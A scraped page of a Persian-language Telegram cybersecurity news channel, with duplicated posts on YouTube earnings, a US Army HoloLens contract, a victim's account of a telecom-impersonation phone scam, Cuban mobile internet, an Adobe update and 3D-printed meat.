به گزارش فوربس، بیشترین پرداختی یوتیوب به پسر هفت ساله ای به نام رایان بود که همراه والدین خود کانال "رایان اسباب بازی را ارزیابی می کند" را ایجاد کرده و در این کانال آنها به بررسی های اسباب بازی های مختلف می پردازند.
در این کانال بیش از 17 میلیون نفر ثبت نام کرده اند، که به لطف آن ویدئو وی 26 میلیارد بار مشاهده شده است. این کانال هر سال برای خانواده رایان 22 میلیون دلار به ارمغان می آورد.
نفردوم جیک پل است. او بیش از 17 میلیون ثبت نام کننده دارد که به طور مرتب ویدیوهای مختلف موسیقی و کمدی وی را تماشا می کند. درآمد سالانه او بیش از 21 میلیون دلار است.
رتبه سوم متعلق به گروه "دود پرفکت" است. پنج دوست در طول یک سال 20 میلیون دلار به خاطر فیلم هایی که در آن ترفندهایی را نشان دادند که با استفاده از وسایل مختلف از تجهیزات ورزشی گرفته تا یک بطری آب انجام می شد بدست آوردند. این کانال تقریبا 37 میلیون ثبت نام کننده دارد.
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
مجله فوربس کانال هایی را که بیشترین درآمد دارند را مشخص کرد.
به گزارش فوربس، بیشترین پرداختی یوتیوب به پسر هفت ساله ای به نام رایان بود که همراه والدین خود کانال "رایان اسباب بازی را ارزیابی می کند" را ایجاد کرده و در این کانال آنها به بررسی های اسباب بازی های مختلف می پردازند.
در این کانال بیش از 17 میلیون نفر ثبت نام کرده اند، که به لطف آن ویدئو وی 26 میلیارد بار مشاهده شده است. این کانال هر سال برای خانواده رایان 22 میلیون دلار به ارمغان می آورد.
نفردوم جیک پل است. او بیش از 17 میلیون ثبت نام کننده دارد که به طور مرتب ویدیوهای مختلف موسیقی و کمدی وی را تماشا می کند. درآمد سالانه او بیش از 21 میلیون دلار است.
رتبه سوم متعلق به گروه "دود پرفکت" است. پنج دوست در طول یک سال 20 میلیون دلار به خاطر فیلم هایی که در آن ترفندهایی را نشان دادند که با استفاده از وسایل مختلف از تجهیزات ورزشی گرفته تا یک بطری آب انجام می شد بدست آوردند. این کانال تقریبا 37 میلیون ثبت نام کننده دارد.
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
Telegram
کانال تخصصی امنیت سایبری «کتاس»
تماس با ادمين📧:
ict.sec@outlook.com
این کانال به جهت آگاهی رساني، مخاطرات امنیتی درحوزه هایICTوICSرابارویکردامن سازی دربرابرخطرات،منتشر و وابسته به هیچ نهاد،گروه،دسته،تشکّل ویاسازمانی نيست ومسئولیت هرگونه استفاده ازمطالب فقط برعهده کاربرش است
ict.sec@outlook.com
این کانال به جهت آگاهی رساني، مخاطرات امنیتی درحوزه هایICTوICSرابارویکردامن سازی دربرابرخطرات،منتشر و وابسته به هیچ نهاد،گروه،دسته،تشکّل ویاسازمانی نيست ومسئولیت هرگونه استفاده ازمطالب فقط برعهده کاربرش است
🔴 قرارداد ۴۸۰ میلیون دلاری ارتش آمریکا با مایکروسافت
هدست واقعیت افزوده هولولنز در حال حاضر توسط ارتش های مختلف در دنیا برای آموزش و تمرین نیروها مورد استفاده قرار می گیرد. اما ارتش آمریکا به تازگی قراردادی با مایکروسافت (سازنده هولولنز) منعقد کرده که طبق آن، هدست مورد بحث در شرایط جنگی و برای عملیات های نظامی مورد استفاده قرار خواهد گرفت.
قرارداد ۴۸۰ میلیون دلاری ارتش آمریکا با کمپانی مایکروسافت که در راستای به روزرسانی نیروهای نظامی ایالات متحده تنظیم شده، قرار است برای افزایش کشندگی سربازان در میدان جنگ، توانایی تشخیص هدف، تصمیم گیری و درگیر شدن را پیش از آگاهی دشمن از شرایط فراهم کند. تعداد هدست های سفارش داده شده حداقل ۱۰۰ هزارتا اعلام شده است .
ارتش آمریکا به منظور تأمین نیاز خود، مناقصه ای برگزار کرد و طی آن از شرکت های غیر نظامی مانند مایکروسافت و مجیک لیپ برای ارائه طرح هایشان دعوت نمود.
ارتش برای هدست واقعیت افزوده مورد نظر الزاماتی دارد که عبارت اند از امکان دید در شب، سنجش تنفس و علائم حیاتی، محافظت از گوش ها و پایش ضربات وارده به سر. البته مشخص نیست مایکروسافت چگونه می خواهد الزامات مذکور را در هولولنز پیاده سازی کند.
هدست واقعیت افزوده هولولنز هیچوقت به صورت عمومی عرضه نشد و بیشتر توسط شرکت های مختلف به عنوان ابزاری برای تولید، آموزش، بازاریابی و سایر اهداف سازمانی مورد استفاده قرار گرفت. هدست مورد بحث همچنین توسط فضانوردان ایستگاه فضایی بین المللی نیز برای تمرینات خاص استفاده شده است.
بلومبرگ فارسی✔️
https://www.bloomberg.com/news/articles/2018-11-28/microsoft-wins-480-million-army-battlefield-contract
.
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
هدست واقعیت افزوده هولولنز در حال حاضر توسط ارتش های مختلف در دنیا برای آموزش و تمرین نیروها مورد استفاده قرار می گیرد. اما ارتش آمریکا به تازگی قراردادی با مایکروسافت (سازنده هولولنز) منعقد کرده که طبق آن، هدست مورد بحث در شرایط جنگی و برای عملیات های نظامی مورد استفاده قرار خواهد گرفت.
قرارداد ۴۸۰ میلیون دلاری ارتش آمریکا با کمپانی مایکروسافت که در راستای به روزرسانی نیروهای نظامی ایالات متحده تنظیم شده، قرار است برای افزایش کشندگی سربازان در میدان جنگ، توانایی تشخیص هدف، تصمیم گیری و درگیر شدن را پیش از آگاهی دشمن از شرایط فراهم کند. تعداد هدست های سفارش داده شده حداقل ۱۰۰ هزارتا اعلام شده است .
ارتش آمریکا به منظور تأمین نیاز خود، مناقصه ای برگزار کرد و طی آن از شرکت های غیر نظامی مانند مایکروسافت و مجیک لیپ برای ارائه طرح هایشان دعوت نمود.
ارتش برای هدست واقعیت افزوده مورد نظر الزاماتی دارد که عبارت اند از امکان دید در شب، سنجش تنفس و علائم حیاتی، محافظت از گوش ها و پایش ضربات وارده به سر. البته مشخص نیست مایکروسافت چگونه می خواهد الزامات مذکور را در هولولنز پیاده سازی کند.
هدست واقعیت افزوده هولولنز هیچوقت به صورت عمومی عرضه نشد و بیشتر توسط شرکت های مختلف به عنوان ابزاری برای تولید، آموزش، بازاریابی و سایر اهداف سازمانی مورد استفاده قرار گرفت. هدست مورد بحث همچنین توسط فضانوردان ایستگاه فضایی بین المللی نیز برای تمرینات خاص استفاده شده است.
بلومبرگ فارسی✔️
https://www.bloomberg.com/news/articles/2018-11-28/microsoft-wins-480-million-army-battlefield-contract
.
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
Bloomberg.com
Microsoft Wins $480 Million Army Battlefield Contract
The military plans to purchase as many as 100,000 HoloLens augmented reality devices.
👁 داستان یک کلاهبرداری تلفنی
🔻شمارهی 9216148725 امشب با من تماس گرفت. گفت من از طرف همراه اول تماس میگیرم، شما چون همهی قبضهاتون توی یک سال اخیر رو به صورت اینترنتی و یا سامانه همراه پرداخت کردید و توی فرهنگسازی!! دست داشتید و کمک کردید، توی قرعهکشی شرکت داده شدید و برنده شدید.
🔻پرسید صاحب خط خودتونید؟ گفتم بله. اسمم رو گفت و گفت این نام خودتونه؟ گفتم بله. گفت جایزه پنج ملیون تومن کمکهزینه سفر به عتبات عالیاته. الان برنامهی ما زنده در حال پخشه، آقای آذری جهرمی مهمان برنامه هستن، وصلتون میکنیم لطفا صحبت سیاسی و اینها نکنید.
🔻مجری «برنامه!!» ازم یکسری سوال درباره نحوه و کیفیت سرویسهای همراه اول پرسید و بعد گفت مبارکتون باشه، همکارانم الان برای دریافت هدیه راهنماییتون میکنن. صداش خیلی هم قطع و وصل میشد.
🔻نفر بعدی که باهام صحبت کرد، اطلاعات شخصیم (شماره تلفن، زمانی که خط رو گرفتم، بانکهایی که توشون حساب دارم و شعبشون و شماره کارتهام و یک سری اطلاعات مثل نام والدینم) رو داشت و برام خوند. بعد گفت ما کمکهزینه رو در دو حوالهی ۲ملیون و ۵۰۰ی به دوتا کارت براتون واریز میکنیم.
🔻اما گفت باید همین الان برید از اون دوتا کارت ( بانکهایی که توشون حساب دارم رو نام برد) از خودپرداز موجودی بگیرید. گفتم کارتها همراهم نیست، گفت نیازه که قبل و بعد از واریز موجودی بگیرید، تا مطمئن بشید که مبلغ واریز شده. گفتم موجودیم رو میدونم. گفت رسید چاپی لازمه.
🔻من دیگه جدی شک کرده بودم، گفتم که الان نمیتونم برم دم خودپرداز، شمارهی مادرم رو گرفت و با هردوتامون صحبت کرد و گفت که باید برید دم خودپرداز موجودی بگیرید، و به مادرم گفت تماس رو قطع نکنید الان، بعد از گرفتن موجودی عدد ۱ رو بگیرید تا پروسه رو ادامه بدیم.
🔻ارتباط من رو قطع کرد، من اول تمام موجودی حسابم رو انتقال دادم به یه کارت دیگه، بعد زنگ زدم به همراه اول. با اپراتور صحبت کردم و شماره رو اعلام کردم، گفت مربوط به همراه اول نیست اصلا، هرچه زودتر از طریق مراجع قضایی پیگیری کنید تا کاری نکردن.
🔻توی این فاصله مادرم هم رفته بود دم خودپرداز و موجودیش رو انتقال داده بود به یه کارت دیگه. شخصی که باهاش صحبت میکرد، گفته چرا تراکنش انجام دادید و الان نمیشه ما بهتون واریز کنیم دیگه، بعد هم ازش خواسته بود که با حساب سپردهش موجودی بگیره. مادرم هم گفته اون کارت دم دستم نیست.
🔻طرف گفته پس ما مقدار کمتری رو واریز میکنیم به حسابتون، و یکسری مدارک نام برده که فردا با اینها برید بانک تا پول رو از حالت بلوکه دربیارید، و قطع کرده. مادرم با ۱۱۰ تماس گرفته و توضیح داده که چه اتفاقی افتاده، شماره رو اعلام کرده و گفتن که کلاهبرداریه و پیگیری میکنن.
🔻شماره مجددا با من تماس گرفت، گفت ما یک مقداری از مبلغ رو نمیتونیم واریز کنیم، به جاش براتون دوماه مکالمه رایگان فعال میکنیم. گفتم باشه. گفت اساماسش الان براتون میاد. منم گفتم باشه :))) و قطع کردم.
🔻هردو (من و مادرم) کارتهایی که باهاشون تراکنش انجام دادهبودیم (هرچند که انتقال وجه بود) رو سوزوندیم و شماره رو به همراه اول و پلیس اعلام کردیم و بعد از توی گوشی بلاک کردیم و داستان تموم شد. اما هنوز برام ترسناکه که اون کلاهبردار، همهی اطلاعتمون رو داشت.
منبع : توییتر
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
🔻شمارهی 9216148725 امشب با من تماس گرفت. گفت من از طرف همراه اول تماس میگیرم، شما چون همهی قبضهاتون توی یک سال اخیر رو به صورت اینترنتی و یا سامانه همراه پرداخت کردید و توی فرهنگسازی!! دست داشتید و کمک کردید، توی قرعهکشی شرکت داده شدید و برنده شدید.
🔻پرسید صاحب خط خودتونید؟ گفتم بله. اسمم رو گفت و گفت این نام خودتونه؟ گفتم بله. گفت جایزه پنج ملیون تومن کمکهزینه سفر به عتبات عالیاته. الان برنامهی ما زنده در حال پخشه، آقای آذری جهرمی مهمان برنامه هستن، وصلتون میکنیم لطفا صحبت سیاسی و اینها نکنید.
🔻مجری «برنامه!!» ازم یکسری سوال درباره نحوه و کیفیت سرویسهای همراه اول پرسید و بعد گفت مبارکتون باشه، همکارانم الان برای دریافت هدیه راهنماییتون میکنن. صداش خیلی هم قطع و وصل میشد.
🔻نفر بعدی که باهام صحبت کرد، اطلاعات شخصیم (شماره تلفن، زمانی که خط رو گرفتم، بانکهایی که توشون حساب دارم و شعبشون و شماره کارتهام و یک سری اطلاعات مثل نام والدینم) رو داشت و برام خوند. بعد گفت ما کمکهزینه رو در دو حوالهی ۲ملیون و ۵۰۰ی به دوتا کارت براتون واریز میکنیم.
🔻اما گفت باید همین الان برید از اون دوتا کارت ( بانکهایی که توشون حساب دارم رو نام برد) از خودپرداز موجودی بگیرید. گفتم کارتها همراهم نیست، گفت نیازه که قبل و بعد از واریز موجودی بگیرید، تا مطمئن بشید که مبلغ واریز شده. گفتم موجودیم رو میدونم. گفت رسید چاپی لازمه.
🔻من دیگه جدی شک کرده بودم، گفتم که الان نمیتونم برم دم خودپرداز، شمارهی مادرم رو گرفت و با هردوتامون صحبت کرد و گفت که باید برید دم خودپرداز موجودی بگیرید، و به مادرم گفت تماس رو قطع نکنید الان، بعد از گرفتن موجودی عدد ۱ رو بگیرید تا پروسه رو ادامه بدیم.
🔻ارتباط من رو قطع کرد، من اول تمام موجودی حسابم رو انتقال دادم به یه کارت دیگه، بعد زنگ زدم به همراه اول. با اپراتور صحبت کردم و شماره رو اعلام کردم، گفت مربوط به همراه اول نیست اصلا، هرچه زودتر از طریق مراجع قضایی پیگیری کنید تا کاری نکردن.
🔻توی این فاصله مادرم هم رفته بود دم خودپرداز و موجودیش رو انتقال داده بود به یه کارت دیگه. شخصی که باهاش صحبت میکرد، گفته چرا تراکنش انجام دادید و الان نمیشه ما بهتون واریز کنیم دیگه، بعد هم ازش خواسته بود که با حساب سپردهش موجودی بگیره. مادرم هم گفته اون کارت دم دستم نیست.
🔻طرف گفته پس ما مقدار کمتری رو واریز میکنیم به حسابتون، و یکسری مدارک نام برده که فردا با اینها برید بانک تا پول رو از حالت بلوکه دربیارید، و قطع کرده. مادرم با ۱۱۰ تماس گرفته و توضیح داده که چه اتفاقی افتاده، شماره رو اعلام کرده و گفتن که کلاهبرداریه و پیگیری میکنن.
🔻شماره مجددا با من تماس گرفت، گفت ما یک مقداری از مبلغ رو نمیتونیم واریز کنیم، به جاش براتون دوماه مکالمه رایگان فعال میکنیم. گفتم باشه. گفت اساماسش الان براتون میاد. منم گفتم باشه :))) و قطع کردم.
🔻هردو (من و مادرم) کارتهایی که باهاشون تراکنش انجام دادهبودیم (هرچند که انتقال وجه بود) رو سوزوندیم و شماره رو به همراه اول و پلیس اعلام کردیم و بعد از توی گوشی بلاک کردیم و داستان تموم شد. اما هنوز برام ترسناکه که اون کلاهبردار، همهی اطلاعتمون رو داشت.
منبع : توییتر
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
Twitter
گربه حنایی
۱/ شمارهی ۰۲۱۶۱۴۸۷۲۵ امشب با من تماس گرفت. گفت من از طرف همراه اول تماس میگیرم، شما چون همهی قبضهاتون توی یک سال اخیر رو به صورت اینترنتی و یا سامانه همراه پرداخت کردید و توی فرهنگسازی!! دست داشتید و کمک کردید، توی قرعهکشی شرکت داده شدید و برنده شدید.
This media is not supported in your browser
VIEW IN TELEGRAM
#ربات های گارسون
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
📲 مردم کوبا از امروز میتوانند از اینترنت موبایل (تری جی) استفاده کنند.
🔸اتسکا، شرکت خدمات اینترنتی میگوید که شهروندان کوبایی از امروز میتوانند برای برخورداری از این سرویس ثبت نام کنند.
🔸تا کنون در کوبا افراد از وای فای مکانهای مختلف و کافههای اینترنتی استفاده میکردند و سرویس اینرنتی موبایل محدود به کارمندان دولت، خبرنگاران و تاجران خارجی بوده است.
🔹البته همچنان برای بسیاری در کوبا استفاده از اینترنت موبایل به دلیل هزینه بالای آن ممکن نخواهد بود.
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
🔸اتسکا، شرکت خدمات اینترنتی میگوید که شهروندان کوبایی از امروز میتوانند برای برخورداری از این سرویس ثبت نام کنند.
🔸تا کنون در کوبا افراد از وای فای مکانهای مختلف و کافههای اینترنتی استفاده میکردند و سرویس اینرنتی موبایل محدود به کارمندان دولت، خبرنگاران و تاجران خارجی بوده است.
🔹البته همچنان برای بسیاری در کوبا استفاده از اینترنت موبایل به دلیل هزینه بالای آن ممکن نخواهد بود.
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
Telegram
کانال تخصصی امنیت سایبری «کتاس»
تماس با ادمين📧:
ict.sec@outlook.com
این کانال به جهت آگاهی رساني، مخاطرات امنیتی درحوزه هایICTوICSرابارویکردامن سازی دربرابرخطرات،منتشر و وابسته به هیچ نهاد،گروه،دسته،تشکّل ویاسازمانی نيست ومسئولیت هرگونه استفاده ازمطالب فقط برعهده کاربرش است
ict.sec@outlook.com
این کانال به جهت آگاهی رساني، مخاطرات امنیتی درحوزه هایICTوICSرابارویکردامن سازی دربرابرخطرات،منتشر و وابسته به هیچ نهاد،گروه،دسته،تشکّل ویاسازمانی نيست ومسئولیت هرگونه استفاده ازمطالب فقط برعهده کاربرش است
انتشار به روز رسانی امنیتیجدید توسط ادوبی
Adobe Releases Security Updates
https://helpx.adobe.com/security/products/flash-player/apsb18-42.html
#Cyber #InfoSec #Cybersecurity
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
Adobe Releases Security Updates
https://helpx.adobe.com/security/products/flash-player/apsb18-42.html
#Cyber #InfoSec #Cybersecurity
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
Adobe
Free and discontinued products | Support options
Phone and chat support is not available for free or discontinued software or services. Learn what other support resources might be available.
This media is not supported in your browser
VIEW IN TELEGRAM
☣️ ویدیو: حفاظت از کودکان و نوجوانان در فضای سایبری
( CyberSafety for Kids )
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
( CyberSafety for Kids )
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
چاپ گوشت با پرینتر سه بعدی در اسرائیل
استارت آپ جت ایت، تحت مدیریت قصاب سابق با پرینتر سه بعدی گوشت 100 گیاهی ساخت که گفته می شود از گوشت طبیعی تشخیص داده نمی شود.
به منظور چاپ گوشت، کارشناسان "جت ایت" یک چاپگر ویژه سه بعدی طراحی کرده اند.
برای ساخت این چاپگر از کمک یاشار بن شیتریت، مدیر استارت آپ که یک قصاب سابق است استفاده شده است وی تصمیم به استفاده از دانش حرفه ای خود برای ایجاد گوشت مصنوعی، که بافت آن کاملا شبیه به گوشت باشد گرفته است.
وی گفت: گوشت از بافت عضلانی، چربی، میوگلوبین و بافت همبند ساخته شده است و در ادامه توضیح داد: با کمک یک چاپگر سه بعدی و تنظیمات دقیق، ما توانستیم یک ماتریس پیچیده ایجاد کنیم که ساختار گوشت را به طور کامل تکرار کند..
استارت آپ جت ایت در سال 2018 و با 5 کارمند تاسیس شد.
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
استارت آپ جت ایت، تحت مدیریت قصاب سابق با پرینتر سه بعدی گوشت 100 گیاهی ساخت که گفته می شود از گوشت طبیعی تشخیص داده نمی شود.
به منظور چاپ گوشت، کارشناسان "جت ایت" یک چاپگر ویژه سه بعدی طراحی کرده اند.
برای ساخت این چاپگر از کمک یاشار بن شیتریت، مدیر استارت آپ که یک قصاب سابق است استفاده شده است وی تصمیم به استفاده از دانش حرفه ای خود برای ایجاد گوشت مصنوعی، که بافت آن کاملا شبیه به گوشت باشد گرفته است.
وی گفت: گوشت از بافت عضلانی، چربی، میوگلوبین و بافت همبند ساخته شده است و در ادامه توضیح داد: با کمک یک چاپگر سه بعدی و تنظیمات دقیق، ما توانستیم یک ماتریس پیچیده ایجاد کنیم که ساختار گوشت را به طور کامل تکرار کند..
استارت آپ جت ایت در سال 2018 و با 5 کارمند تاسیس شد.
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
Telegram
کانال تخصصی امنیت سایبری «کتاس»
تماس با ادمين📧:
ict.sec@outlook.com
این کانال به جهت آگاهی رساني، مخاطرات امنیتی درحوزه هایICTوICSرابارویکردامن سازی دربرابرخطرات،منتشر و وابسته به هیچ نهاد،گروه،دسته،تشکّل ویاسازمانی نيست ومسئولیت هرگونه استفاده ازمطالب فقط برعهده کاربرش است
ict.sec@outlook.com
این کانال به جهت آگاهی رساني، مخاطرات امنیتی درحوزه هایICTوICSرابارویکردامن سازی دربرابرخطرات،منتشر و وابسته به هیچ نهاد،گروه،دسته،تشکّل ویاسازمانی نيست ومسئولیت هرگونه استفاده ازمطالب فقط برعهده کاربرش است